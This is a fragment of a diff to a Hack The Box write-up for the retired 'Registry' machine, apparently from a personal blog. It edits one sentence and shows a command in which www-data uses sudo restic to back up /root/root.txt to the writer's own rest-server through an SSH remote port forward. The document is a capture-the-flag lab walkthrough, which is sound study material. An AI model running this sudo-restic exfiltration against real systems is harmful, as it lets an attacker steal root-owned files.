grav3m1nd-byte/grav3m1nd-byte.github.io/HTB-Retired/Registry/registry.md

 tcp6       0      0 :::80                   :::*                    LISTEN      -
 tcp6       0      0 ::1:61234               :::*                    LISTEN      -
 ```

-As TCP 61234 is now being used by registry.htb, rest-server is running on TCP 8000 on the localhost, let try and run restic from registry.htb as www-data and try to exfiltrate the root.txt file using the port opened previous through SSH Remote Port Forwarding.
+As TCP 61234 is now being used by registry.htb, rest-server is running on TCP 8000 on my localhost, let's try and run restic from registry.htb as www-data and try to exfiltrate the root.txt file using the port opened previously through SSH Remote Port Forwarding.

 ```
 www-data@bolt:~/html/bolt/theme$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:61234/ /root/root.txt
 <ckup -r rest:http://127.0.0.1:61234/ /root/root.txt